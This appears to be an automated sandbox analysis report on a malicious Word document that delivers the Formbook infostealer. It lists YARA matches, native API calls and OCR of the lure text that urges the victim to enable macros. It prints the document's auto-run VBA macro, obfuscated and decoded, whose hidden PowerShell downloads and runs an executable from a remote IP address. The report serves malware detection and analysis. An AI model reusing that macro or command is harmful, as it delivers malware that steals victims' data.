Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 4 Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital Page1 of 1 Owords It? O
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Screenshot number: 8 Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 8 Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital k L Owords It? O Type h
Document contains an embedded VBA macro which may execute processes
Source: RFL_PO 69002.doc OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open, API IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe") Name: Document_Open
Document contains an embedded VBA macro with suspicious strings
Source: RFL_PO 69002.doc OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101)) Name: Document_Open
Abnormal high CPU Usage
Source: C:\Users\Public\Documents\nothinglittle.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00419D60 NtCreateFile, 28_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00419E10 NtReadFile, 28_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00419E90 NtClose, 28_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00419F40 NtAllocateVirtualMemory, 28_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00419D5A NtCreateFile, 28_2_00419D5A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00419E8B NtClose, 28_2_00419E8B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00419F3A NtAllocateVirtualMemory, 28_2_00419F3A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C95D0 NtClose,LdrInitializeThunk, 28_2_012C95D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9710 NtQueryInformationToken,LdrInitializeThunk, 28_2_012C9710
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9780 NtMapViewOfSection,LdrInitializeThunk, 28_2_012C9780
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9660 NtAllocateVirtualMemory,LdrInitializeThunk, 28_2_012C9660
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C96E0 NtFreeVirtualMemory,LdrInitializeThunk, 28_2_012C96E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 28_2_012C9910
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C99A0 NtCreateSection,LdrInitializeThunk, 28_2_012C99A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9860 NtQuerySystemInformation,LdrInitializeThunk, 28_2_012C9860
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9A00 NtProtectVirtualMemory,LdrInitializeThunk, 28_2_012C9A00
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9A50 NtCreateFile,LdrInitializeThunk, 28_2_012C9A50
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012CB040 NtSuspendThread, 28_2_012CB040
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012CA3B0 NtGetContextThread, 28_2_012CA3B0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9520 NtWaitForSingleObject, 28_2_012C9520
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9560 NtWriteFile, 28_2_012C9560
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9540 NtReadFile, 28_2_012C9540
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C95F0 NtQueryInformationFile, 28_2_012C95F0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9730 NtQueryVirtualMemory, 28_2_012C9730
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012CA710 NtOpenProcessToken, 28_2_012CA710
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9760 NtOpenProcess, 28_2_012C9760
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9770 NtSetInformationFile, 28_2_012C9770
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012CA770 NtOpenThread, 28_2_012CA770
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C97A0 NtUnmapViewOfSection, 28_2_012C97A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9610 NtEnumerateValueKey, 28_2_012C9610
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9670 NtQueryInformationProcess, 28_2_012C9670
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9650 NtQueryValueKey, 28_2_012C9650
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C96D0 NtCreateKey, 28_2_012C96D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9950 NtQueueApcThread, 28_2_012C9950
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C99D0 NtCreateProcessEx, 28_2_012C99D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9820 NtEnumerateKey, 28_2_012C9820
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9840 NtDelayExecution, 28_2_012C9840
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C98A0 NtWriteVirtualMemory, 28_2_012C98A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C98F0 NtReadVirtualMemory, 28_2_012C98F0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9B00 NtSetValueKey, 28_2_012C9B00
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9A20 NtResumeThread, 28_2_012C9A20
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9A10 NtQuerySection, 28_2_012C9A10
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9A80 NtOpenDirectoryObject, 28_2_012C9A80
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012CAD30 NtSetContextThread, 28_2_012CAD30
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012C9FE0 NtCreateMutant, 28_2_012C9FE0
Detected potential crypto function
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_030217B0 9_2_030217B0
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_03021785 9_2_03021785
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_03021C18 9_2_03021C18
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_03021C28 9_2_03021C28
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_059DF528 9_2_059DF528
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_059DA4A8 9_2_059DA4A8
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_059D0006 9_2_059D0006
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_059D0040 9_2_059D0040
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_059DEEA0 9_2_059DEEA0
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_059D6B28 9_2_059D6B28
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00401030 28_2_00401030
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041D8BA 28_2_0041D8BA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041D988 28_2_0041D988
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041E2F2 28_2_0041E2F2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_004012FB 28_2_004012FB
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041DA9E 28_2_0041DA9E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00402D88 28_2_00402D88
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00402D90 28_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00409E40 28_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041DE31 28_2_0041DE31
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00409E3B 28_2_00409E3B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041D719 28_2_0041D719
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041CFA3 28_2_0041CFA3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041CFA6 28_2_0041CFA6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00402FB0 28_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041DFB0 28_2_0041DFB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A4120 28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129C1C0 28_2_0129C1C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01341002 28_2_01341002
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B701D 28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B20A0 28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013520A8 28_2_013520A8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129B090 28_2_0129B090
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013460F5 28_2_013460F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AA309 28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0134231B 28_2_0134231B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A3360 28_2_012A3360
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0126337D 28_2_0126337D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B138B 28_2_012B138B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01263382 28_2_01263382
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013323E3 28_2_013323E3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013403DA 28_2_013403DA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AB236 28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0126225E 28_2_0126225E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013522AE 28_2_013522AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013532A9 28_2_013532A9
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0134E2C5 28_2_0134E2C5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B65A0 28_2_012B65A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B2581 28_2_012B2581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129D5E0 28_2_0129D5E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013525DD 28_2_013525DD
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A2430 28_2_012A2430
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129841F 28_2_0129841F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0134D466 28_2_0134D466
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AB477 28_2_012AB477
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012694B8 28_2_012694B8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01344496 28_2_01344496
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013467E2 28_2_013467E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0134D616 28_2_0134D616
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A5600 28_2_012A5600
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01289660 28_2_01289660
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B06C0 28_2_012B06C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0128F900 28_2_0128F900
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A99BF 28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A2990 28_2_012A2990
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0135E824 28_2_0135E824
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AA830 28_2_012AA830
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01286800 28_2_01286800
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012888E0 28_2_012888E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013528EC 28_2_013528EC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01352B28 28_2_01352B28
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AAB40 28_2_012AAB40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0132CB4F 28_2_0132CB4F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012BEBB0 28_2_012BEBB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AEB9A 28_2_012AEB9A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0132EB8A 28_2_0132EB8A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012D8BE8 28_2_012D8BE8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0134DBD2 28_2_0134DBD2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012BABD8 28_2_012BABD8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0133FA2B 28_2_0133FA2B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01345A4F 28_2_01345A4F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01344AEF 28_2_01344AEF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01280D20 28_2_01280D20
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01352D07 28_2_01352D07
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01351D55 28_2_01351D55
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A2D50 28_2_012A2D50
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01342D82 28_2_01342D82
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0134CC77 28_2_0134CC77
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B4CD4 28_2_012B4CD4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01351FF1 28_2_01351FF1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0135DFCE 28_2_0135DFCE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A6E30 28_2_012A6E30
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0130AE60 28_2_0130AE60
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01331EB6 28_2_01331EB6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01352EF7 28_2_01352EF7
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: RFL_PO 69002.doc OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open Name: Document_Open
Document contains embedded VBA macros
Source: RFL_PO 69002.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: String function: 0128B150 appears 177 times
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: String function: 012DD08C appears 51 times
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: String function: 01315720 appears 85 times
Yara signature match
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
